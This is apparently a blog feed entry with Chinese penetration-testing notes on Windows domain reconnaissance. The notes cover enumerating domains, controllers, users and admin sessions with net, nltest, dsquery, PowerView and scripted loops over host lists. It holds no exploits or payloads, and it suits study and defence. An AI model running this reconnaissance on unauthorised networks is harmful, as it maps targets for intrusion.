<content type="html"><![CDATA[<h2 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="Intranet information gathering"></a>Intranet information gathering</h2><h3 id="一-收集本机信息"><a href="#一-收集本机信息" class="headerlink" title="1. Gathering local host information"></a>1. Gathering local host information</h3><h4 id="判断是否有域"><a href="#判断是否有域" class="headerlink" title="Determining whether a domain exists"></a>Determining whether a domain exists</h4><ul><li><p><code>ipconfig /all</code>: look under the <code>Windows IP 配置</code> section</p></li><li><p><code>systeminfo</code>: look at the "Domain" entry; the screenshot shows WORKGROUP, meaning there is no domain<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-16%20162703.png?raw=true"></p></li><li><p><code>net time /domain</code></p><ul><li><p>A domain exists and the current user is a domain user<br><img src="C:\Users\Myprefer\Desktop\640.jpg"></p></li><li><p>A domain exists but the current user is not a domain user<br>Output:</p><pre><code class="language-txt">发生系统错误 5

拒绝访问
</code></pre></li><li><p>No domain exists</p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-17%20152845.png?raw=true"></p></li></ul></li></ul><h4 id="查看当前登录域"><a href="#查看当前登录域" class="headerlink" title="Checking the currently logged-in domain"></a>Checking the currently logged-in domain</h4><ul><li><p><code>net config workstation</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-17%20153107.png?raw=true"></p></li></ul><p>In the screenshot the workstation domain is WORKGROUP, so there is no domain</p><ul><li><p>ping command</p><pre><code class="language-sh">for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.110.%I | findstr "TTL="
</code></pre></li><li><p>Scanning with tools</p><ul><li><p><strong>nbtscan</strong>: a command-line tool that scans for open NetBIOS name servers on a local or remote TCP/IP network</p><ul><li><p><a href="https://github.com/resurrecting-open-source-projects/nbtscan">resurrecting-open-source-projects/nbtscan: Scan networks searching for NetBIOS information (github.com)</a></p></li><li><pre><code class="language-sh">用法: nbtscan-unixwiz [选项] 目标 [目标...]

  目标可以是IP地址,DNS名称或地址的列表范围。
  范围可以表示成“192.168.12.0/24”或“192.168.12.64-97”

  -V  显示版本信息
  -f  显示完整的NBT资源记录响应(推荐)
  -H  生成HTTP请求头
  -v  开启详细输出调试
  -n  不查找响应IP地址的反向名称
  -p &lt;n&gt;  绑定UDP端口(默认0)
  -m  响应中包含MAC地址 (等同'-f')
  -T &lt;n&gt;  超时不响应 (默认2秒)
  -w &lt;n&gt;  次写入后等待秒数 (默认10ms)
  -t &lt;n&gt;  每个地址尝试次数(默认1次)
  -P  以perl的hashref格式生成结果
</code></pre></li></ul></li><li><p><strong>arp-scan</strong>: ARP scanning tool</p><ul><li>Usage: <a href="https://blog.csdn.net/newbeixue/article/details/123111543">arp-scan usage - CSDN blog</a></li></ul></li></ul></li></ul><h4 id="域内端口扫描"><a href="#域内端口扫描" class="headerlink" title="Port scanning within the domain"></a>Port scanning within the domain</h4><ul><li><p><strong>telnet</strong> command scan</p><pre><code class="language-sh">telnet &lt;address&gt; &lt;port&gt;
</code></pre></li><li><p><strong>metasploit</strong> port-scanning module<br><a 
href="https://blog.csdn.net/weixin_44255856/article/details/97900038">渗透之metasploit技术-端口扫描,漏洞利用_search portscan-CSDN博客</a></p></li><li><p><strong>Nmap</strong></p></li></ul><h4 id="查找域控制器"><a href="#查找域控制器" class="headerlink" title="查找域控制器"></a>查找域控制器</h4><ul><li><code>net group "Domain Controllers" /domain</code></li><li><code>nltest /DCLIST:<域名></code></li><li><code>nslookup -type=SRV _LDAP._tcp</code></li><li><code>net time /domain</code></li><li><code>netdom query pdc</code></li></ul><h4 id="获取域内用户和管理员信息"><a href="#获取域内用户和管理员信息" class="headerlink" title="获取域内用户和管理员信息"></a>获取域内用户和管理员信息</h4><ul><li><p><strong>查询所有域用户列表</strong>:</p><ul><li><p><code>net user /domain</code></p></li><li><p><code>wmic useraccount get /all</code></p></li><li><p><code>dsquery user</code></p></li><li><p><code>net localgroup administrators /domain</code></p></li></ul></li><li><p><strong>查询域管理员用户组</strong>:</p><ul><li><code>net group "Enterprise Admains" /domain</code></li></ul></li><li><p><strong>定位域管理员</strong>:</p><ul><li><p><strong>PsLoggedon</strong> - <a href="https://blog.csdn.net/qq_44159028/article/details/115439633">定位域管理员_psloggedon-CSDN博客</a><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20105737.png?raw=true"></p></li><li><p><strong>AdFind</strong>- <a href="https://blog.csdn.net/weixin_43571641/article/details/124263803">域内信息查询工具AdFind_adfind download-CSDN博客</a></p></li><li><p><strong>PVEFindADUser</strong> - <a href="https://blog.csdn.net/qq_44159028/article/details/115439633">定位域管理员 PVEFindADUser-CSDN博客</a><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20110437.png?raw=true"></p></li></ul></li><li><p><strong>查找域管理进程</strong>:</p><ul><li><p>本机检查:</p><ul><li><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" 
tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Admins</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//获取域管理员列表</span></span></code></pre></div></li><li><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">tasklist</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/v</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">列出本机所有进程及进程用户</span></span></code></pre></div><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20110732.png?raw=true"></p></li></ul></li></ul></li><li><p><strong>查询域控制器的域用户会话</strong>:</p><ul><li><p>收集域控制器的列表</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Controllers</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span></span></code></pre></div></li><li><p>收集域管理员列表</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" 
tabindex="0"><code><span class="line"><span style="color: #FFCB6B">net</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">group</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">Domain Admins</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">/domain</span></span></code></pre></div></li><li><p><strong>Netsess</strong><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20111100.png?raw=true"></p></li></ul></li><li><p><strong>扫描远程系统上运行的任务:</strong></p><ul><li><p>前提是目标使用了本地域管理员共享账户</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #BABED8"> (ips.txt) DO @echo </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">+</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> %i </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">@tasklist/V</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/S</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/U</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">user</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/P</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">password</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">2></span><span 
style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">output.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">names.txt</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">DO</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">@type</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">output.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">findstr</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> [!] 
%nwas found running a process on %i && pause</span></span></code></pre></div></li></ul></li><li><p><strong>扫描远程系统上NetBIOS信息</strong>:</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF; font-style: italic">for</span><span style="color: #BABED8"> /F %i </span><span style="color: #89DDFF; font-style: italic">in</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #FFCB6B">ips.txt</span><span style="color: #89DDFF">)</span><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">do</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">@echo</span><span style="color: #BABED8"> [+] Checking %i </span><span style="color: #89DDFF">&&</span><span style="color: #FFCB6B">nbtstat</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-A</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%i</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">2></span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #C3E88D">nbsessions.txt</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">FOR</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/F</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">in</span><span style="color: #BABED8"> (admins.txt)DO @type nbsessions.txt </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">findstr</span><span style="color: #BABED8"> </span><span style="color: 
#C3E88D">/I</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">%n</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">></span><span style="color: #BABED8"> </span><span style="color: #C3E88D">NUL</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">&&</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> [!] %n wasfound logged into %i</span></span></code></pre></div></li></ul><h4 id="利用PowerShell收集域内信息"><a href="#利用PowerShell收集域内信息" class="headerlink" title="利用PowerShell收集域内信息"></a>利用PowerShell收集域内信息</h4><h5 id="命令汇总"><a href="#命令汇总" class="headerlink" title="命令汇总"></a>命令汇总</h5><ul><li><p>域信息收集</p><div class="language-powershell"><button title="Copy code" class="copy"></button><span class="lang">powershell</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">net time </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看时间服务器</span></span><span class="line"><span style="color: #BABED8">net config workstation </span><span style="color: #676E95; font-style: italic">#查询当前登录域及登录用户信息</span></span><span class="line"><span style="color: #BABED8">net user </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查询域内用户</span></span><span class="line"><span style="color: #BABED8">wmic useraccount get </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">all </span><span style="color: #676E95; font-style: italic">#查询域内用户的详细信息</span></span><span class="line"><span style="color: #BABED8">net user xie </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看指定域用户xie的详细信息</span></span><span 
class="line"><span style="color: #BABED8">net view </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看有几个域</span></span><span class="line"><span style="color: #BABED8">net view </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain:xxx </span><span style="color: #676E95; font-style: italic">#查看域内的主机</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域里面的组</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain users</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域用户</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain controllers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域控制器</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain computers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域内所有的主机</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain admins</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> 
</span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域管理员,该组内的成员对域控拥有完全控制权</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">enterprise admins</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看企业管理组,该组内的成员对域控拥有完全控制权</span></span><span class="line"><span style="color: #BABED8">net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain guest</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查看域访客组,权限较低</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8">nltest </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain_trusts </span><span style="color: #676E95; font-style: italic">#查看域信任信息</span></span><span class="line"><span style="color: #BABED8">net accounts </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#查询域密码策略</span></span><span class="line"><span style="color: #BABED8">whoami </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">user </span><span style="color: #676E95; font-style: italic">#查看用户SID和域SID,如用户的SID是:S-1-5-21-2189311154-2766837956-1982445477-520 则域SID则是去掉最后的520:S-1-5-21-2189311154-2766837956-1982445477</span></span><span class="line"><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #BABED8">以下命令只能在域控上查询</span></span><span class="line"><span style="color: #BABED8">dsquery user </span><span 
style="color: #676E95; font-style: italic">#查询目录中的用户</span></span><span class="line"><span style="color: #BABED8">dsquery computer </span><span style="color: #676E95; font-style: italic">#查询目录中的主机</span></span><span class="line"><span style="color: #BABED8">dsquery group </span><span style="color: #676E95; font-style: italic">#查询目录中的组.</span></span><span class="line"><span style="color: #BABED8">dsquery ou </span><span style="color: #676E95; font-style: italic">#查询目录中的组织单元.</span></span><span class="line"><span style="color: #BABED8">dsquery site </span><span style="color: #676E95; font-style: italic">#查询目录中的站点</span></span><span class="line"><span style="color: #BABED8">dsquery server </span><span style="color: #676E95; font-style: italic">#查询域控</span></span><span class="line"><span style="color: #BABED8">dsquery contact </span><span style="color: #676E95; font-style: italic">#查询目录中的联系人</span></span><span class="line"><span style="color: #BABED8">dsquery subnet </span><span style="color: #676E95; font-style: italic">#查询目录中的子网</span></span><span class="line"><span style="color: #BABED8">dsquery quota </span><span style="color: #676E95; font-style: italic">#查询目录中的配额规定.</span></span><span class="line"><span style="color: #BABED8">dsquery partition </span><span style="color: #676E95; font-style: italic">#查询目录中的分区.</span></span><span class="line"><span style="color: #BABED8">dsquery </span><span style="color: #89DDFF">*</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#用通用的LDAP查询来查找目录中的任何对 </span></span><span class="line"><span style="color: #BABED8">dsquery server –domain </span><span style="color: #82AAFF">xie.com</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> dsget server–dnsname –site </span><span style="color: #676E95; font-style: italic">#搜索域内域控制器的DNS主机名和站点名</span></span><span class="line"><span style="color: #BABED8">dsquery computer domainroot –name 
</span><span style="color: #89DDFF">-</span><span style="color: #BABED8">xp –limit </span><span style="color: #F78C6C">10</span><span style="color: #BABED8"> </span><span style="color: #676E95; font-style: italic">#搜索域内以-xp结尾的机器10台</span></span><span class="line"><span style="color: #BABED8">dsquery user domainroot –name admin </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">limit </span><span style="color: #676E95; font-style: italic">#搜索域内以admin开头的用户10个</span></span></code></pre></div></li><li><p>查询域控的主机名</p><div class="language-powershell"><button title="Copy code" class="copy"></button><span class="lang">powershell</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #BABED8">方法一:net group </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">domain controllers</span><span style="color: #89DDFF">"</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span><span style="color: #676E95; font-style: italic">#这里查询结果后面会多一个 $ </span></span><span class="line"><span style="color: #BABED8">方法二:nltest </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">DCLIST:</span><span style="color: #82AAFF">xie.com</span></span><span class="line"><span style="color: #BABED8">方法三:net time </span><span style="color: #89DDFF">/</span><span style="color: #BABED8">domain </span></span><span class="line"><span style="color: #BABED8">方法四:nslookup </span><span style="color: #89DDFF">-</span><span style="color: #BABED8">type</span><span style="color: #89DDFF">=</span><span style="color: #BABED8">srv _ldap._tcp</span></span><span class="line"><span style="color: #BABED8">方法五:查看DNS服务器的地址,一般DNS服务器的IP就是域控的地址</span></span><span class="line"><span style="color: #BABED8">方法六:netdom query pdc </span><span style="color: #676E95; font-style: italic">#该命令只能在域控上执行</span></span><span 
class="line"><span style="color: #BABED8">方法七:dsquery server </span><span style="color: #676E95; font-style: italic">#该命令只能在域控上执行</span></span></code></pre></div></li></ul><h5 id="利用PowerSploit"><a href="#利用PowerSploit" class="headerlink" title="利用PowerSploit"></a>利用PowerSploit</h5><ul><li><p>PowerShell 常用的执行权限共有四种</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">Restricted:默认设置,不允许执行任何脚本。</span></span><span class="line"><span style="color: #FFCB6B">Allsigned:只能运行经过证书验证的脚本。</span></span><span class="line"><span style="color: #FFCB6B">Unrestricted:权限最高,可以执行任意脚本。</span></span><span class="line"><span style="color: #FFCB6B">RemoteSigned:本地脚本无限制,但是对来自网络的脚本必须经过签名。</span></span></code></pre></div><p>在 PowerShell 中输入“Get-ExecutionPolicy”,可以看到当前权限<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-18%20112615.png?raw=true"></p></li><li><p>使用<strong>PowerSploit</strong>的<strong>PowerView</strong>脚本</p><ul><li><p>导入脚本</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">Import-Module</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">.</span><span style="color: #BABED8">\P</span><span style="color: #C3E88D">owerView.ps1</span></span></code></pre></div></li><li><p>功能:</p><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"></span><span class="line"><span style="color: #FFCB6B">Get-NetDomain</span><span style="color: #BABED8"> </span><span 
style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前用户所在的域名称。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetUser</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">返回所有用户的详细信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetDomainController</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域控制器。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetComputer</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域内机器的详细信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetOU</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域中的</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">OU</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetGroup</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取所有域内组和组成员信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetFileServer</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">根据</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">SPN</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前域使用的文件服务器。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetShare</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span 
style="color: #BABED8"> </span><span style="color: #C3E88D">获取当前域内所有网络共享。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetSession</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取在指定服务器存在的会话信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetRDPSession</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取在指定服务器存在的远程连接信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetProcess</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取远程主机的进程信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-UserEvent</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取指定用户的日志信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-ADObject</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取活动目录的对象信息。</span></span><span class="line"><span style="color: #FFCB6B">Get-NetGPO</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域所有组策略对象。</span></span><span class="line"><span style="color: #FFCB6B">Get-DomainPolicy</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">获取域默认或域控制器策略。</span></span><span class="line"><span style="color: #FFCB6B">Invoke-UserHunter</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">//</span><span style="color: #BABED8"> </span><span style="color: 
#C3E88D">用于获取域用户登录计算机及该用户是否有本地管理权限。</span></span></code></pre></div></li></ul></li></ul>]]></content>
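The note on whoami /user above says the domain SID is the user SID with its final RID removed. This added PowerShell example (not from the original post) does that split and flags the well-known privileged RIDs; the sample SID is the one quoted in the note, used here as constructed input.

```powershell
# Added example: split a SID as printed by "whoami /user" into domain SID and RID.
# Uses only built-in .NET types, so it runs on any Windows host, domain-joined or not.
# The sample SID at the bottom is a constructed value, not a real identifier.

function Split-AccountSid {
    param([Parameter(Mandatory)][string]$Sid)

    # Well-known RIDs that mark privileged principals in every AD domain
    $knownRids = @{
        500 = 'Administrator (built-in)'
        502 = 'krbtgt'
        512 = 'Domain Admins'
        519 = 'Enterprise Admins'
        520 = 'Group Policy Creator Owners'
    }

    # Validates the syntax; throws on anything that is not a SID
    $null = [System.Security.Principal.SecurityIdentifier]::new($Sid)

    $parts = $Sid.Split('-')
    # Domain account SIDs look like S-1-5-21-a-b-c-rid; anything else has no domain part
    if ($parts.Count -ne 8 -or $parts[3] -ne '21') {
        return [pscustomobject]@{ Sid = $Sid; DomainSid = $null; Rid = $null; WellKnown = $null }
    }

    $rid = [int]$parts[7]
    [pscustomobject]@{
        Sid       = $Sid
        DomainSid = ($parts[0..6] -join '-')   # everything before the RID
        Rid       = $rid
        WellKnown = $knownRids[$rid]          # $null for an ordinary account
    }
}

# Constructed sample with the same shape as the SID in the note above
Split-AccountSid -Sid 'S-1-5-21-2189311154-2766837956-1982445477-520'

# On a domain-joined host, parse the live value instead:
# Split-AccountSid -Sid ((whoami /user /fo csv | ConvertFrom-Csv).SID)
```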
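The "local check" above pairs the Domain Admins list from net group with tasklist /v to see whether a privileged account is running anything on this host, which is also the check a defender runs to catch domain-admin credentials exposed on workstations. This added PowerShell example (not the post's own code) parses the net group output, including the trailing $ on computer accounts that the post mentions, and matches it against local process owners; the sample output and the domain name EXAMPLE are constructed placeholders.

```powershell
# Added example: parse "net group GROUP /domain" output and audit local process owners.
# ConvertFrom-NetGroupMembers handles the real layout: header lines, a dashed rule,
# member names in three 25-character columns, then "The command completed successfully."
# Find-PrivilegedProcess needs an elevated shell (Get-Process -IncludeUserName).

function ConvertFrom-NetGroupMembers {
    param([Parameter(Mandatory)][string[]]$Lines)

    $inBody = $false
    foreach ($line in $Lines) {
        if ($line -match '^-{10,}') { $inBody = $true; continue }   # the rule ends the header
        if (-not $inBody) { continue }
        if ($line -match '^The command completed') { break }
        # Column layout: up to three names per line, each padded to 25 characters
        for ($i = 0; $i -lt $line.Length; $i += 25) {
            $len  = [Math]::Min(25, $line.Length - $i)
            $name = $line.Substring($i, $len).Trim()
            if ($name) { $name }   # a computer account keeps its trailing $
        }
    }
}

function Find-PrivilegedProcess {
    param(
        [Parameter(Mandatory)][string[]]$Members,
        [Parameter(Mandatory)][string]$Domain     # NetBIOS domain name, e.g. EXAMPLE
    )
    # Get-Process reports owners as DOMAIN\user, so build that form for each member;
    # -contains compares case-insensitively, matching how Windows treats account names.
    $wanted = $Members | ForEach-Object { "$Domain\$_" }
    Get-Process -IncludeUserName -ErrorAction SilentlyContinue |
        Where-Object { $_.UserName -and ($wanted -contains $_.UserName) } |
        Select-Object Id, ProcessName, UserName
}

# Constructed sample of the output of: net group "Domain Admins" /domain  (not real data)
$SampleNetGroupOutput = @(
    'Group name     Domain Admins'
    'Comment        Designated administrators of the domain'
    ''
    'Members'
    ''
    '-------------------------------------------------------------------------------'
    'Administrator            xie                      ops-admin'
    'The command completed successfully.'
)

$admins = ConvertFrom-NetGroupMembers -Lines $SampleNetGroupOutput
$admins   # Administrator, xie, ops-admin

# Live use on a domain-joined, elevated host (EXAMPLE is a placeholder domain name):
# $admins = ConvertFrom-NetGroupMembers -Lines (net group "Domain Admins" /domain)
# Find-PrivilegedProcess -Members $admins -Domain 'EXAMPLE'
```

An empty result from Find-PrivilegedProcess on a workstation is the expected healthy state; any hit means a domain-admin token is resident on that host.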
<summary type="html"><![CDATA[<h2 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>Intranet information gathering</h2><h3 id="一-收集本机信息"><a href="#一-收集本机信息" class="headerlink" title="一.收集本机信息"></a>I. Collecting local host information</h3>]]></summary>
</entry>
<entry>
<title>Intranet Security - Basic Concepts</title>
